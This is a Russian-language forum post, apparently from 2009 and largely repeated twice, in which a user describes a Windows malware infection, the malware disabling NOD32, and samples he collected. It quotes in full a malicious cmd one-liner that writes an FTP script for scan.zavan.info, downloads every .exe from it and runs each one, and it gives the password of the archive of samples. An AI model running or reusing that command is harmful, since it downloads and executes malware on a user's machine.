у меня та же проблема (была - переустановил Windows):
я недавно заметил, что в процессах висит такая комманда:
Cmd /c md SC&cd SC&del /f /s /q *.*&echo open scan.zavan.info>k.x&echo out>>k.x&echo 123>>k.x&Echo mget *.exe>>k.x&Echo bye>>k.x&ftp -i -s:k.x&del k.x&echo for %%i in (*.exe) do start %%i>D.bat&D.bat&del D.bat
с порождённой им ftp -i -s:k.x
Ну я зашёл на этот адрес - там пусто, даже LIST не выполняется. Как сделать так, чтобы эта комманда не запускалась - я не знал и смирился.
Потом мне посчасливилось по несусветной глупости установить некий flowMediaDecoder_60, который представлял из себя ленту новостей с вымогательством
, закрывающей обзор в IE.
На сайте http://www.spyware-ru.com/ прочитал что надо делать - отключил антивирус и запустил ComboFix.exe - на одном из шагов требовалось. Интернет был включен... Видимо на фтп появилась новая подборка свежайших китайских вирусов))). Вот они безболезненно скачались и прорвало... В процессах висело штук 20 их копий, которые запускали друг друга наперебой, когда убиваешь один из них (жаль сразу все не убить - даже в продвинутом procexp нет такой функции), эксплорер нельзя открыть (сначала вообще-то открывал китайские сайты сам по себе). Сам файл ComboFix.exe был удалён ими видимо (а может и показалось). Всё зависло - я перезагрузил машину. Запуская сканирование NOD32 (2.7 версии) они пытались закрыть окно. Сам резидентный модуль был ими деинсталлирован - в процессах его не висело, переустановка ни к чему не приводила. Я создал документ с именем nod32.txt и открыл блокнотом - он закрылся. Я знал, что есть функция GetWindowText. Всё кончено - подумал я 
.
Потом я не долго думая зашёл на фтп scan.zavan.info и скачал их все и запаковал. До сих пор их сигнатуры не находятся в базах nod32 (10.02.09 числа) - при распаковке - тихо.
8 штук с фтп. И ещё я нашёл на дисках (2 жёстких отцепил перед установкой Windows - чтобы сначала отключить autorun полностью всех типов устройств и скачать базы для nod32 последние предварительно) в корнях какие-то auto.exe и boot.exe - они nod32 определяются как вредоносные. плюс эта "новостная лента" flowMediaDecoder_60.exe. Пароль - virus.
я недавно заметил, что в процессах висит такая комманда:
Cmd /c md SC&cd SC&del /f /s /q *.*&echo open scan.zavan.info>k.x&echo out>>k.x&echo 123>>k.x&Echo mget *.exe>>k.x&Echo bye>>k.x&ftp -i -s:k.x&del k.x&echo for %%i in (*.exe) do start %%i>D.bat&D.bat&del D.bat
с порождённой им ftp -i -s:k.x
Ну я зашёл на этот адрес - там пусто, даже LIST не выполняется. Как сделать так, чтобы эта комманда не запускалась - я не знал и смирился.
Потом мне посчасливилось по несусветной глупости установить некий flowMediaDecoder_60, который представлял из себя ленту новостей с вымогательством
, закрывающей обзор в IE.На сайте http://www.spyware-ru.com/ прочитал что надо делать - отключил антивирус и запустил ComboFix.exe - на одном из шагов требовалось. Интернет был включен... Видимо на фтп появилась новая подборка свежайших китайских вирусов))). Вот они безболезненно скачались и прорвало... В процессах висело штук 20 их копий, которые запускали друг друга наперебой, когда убиваешь один из них (жаль сразу все не убить - даже в продвинутом procexp нет такой функции), эксплорер нельзя открыть (сначала вообще-то открывал китайские сайты сам по себе). Сам файл ComboFix.exe был удалён ими видимо (а может и показалось). Всё зависло - я перезагрузил машину. Запуская сканирование NOD32 (2.7 версии) они пытались закрыть окно. Сам резидентный модуль был ими деинсталлирован - в процессах его не висело, переустановка ни к чему не приводила. Я создал документ с именем nod32.txt и открыл блокнотом - он закрылся
. Я знал, что есть функция GetWindowText. Всё кончено - подумал я .Потом я не долго думая зашёл на фтп scan.zavan.info и скачал их все и запаковал. До сих пор их сигнатуры не находятся в базах nod32 (10.02.09 числа) - при распаковке - тихо.
8 штук с фтп. И ещё я нашёл на дисках (2 жёстких отцепил перед установкой Windows - чтобы сначала отключить autorun полностью всех типов устройств и скачать базы для nod32 последние предварительно) в корнях какие-то auto.exe и boot.exe - они nod32 определяются как вредоносные. плюс эта "новостная лента" flowMediaDecoder_60.exe. Пароль - virus.
Последнее редактирование:
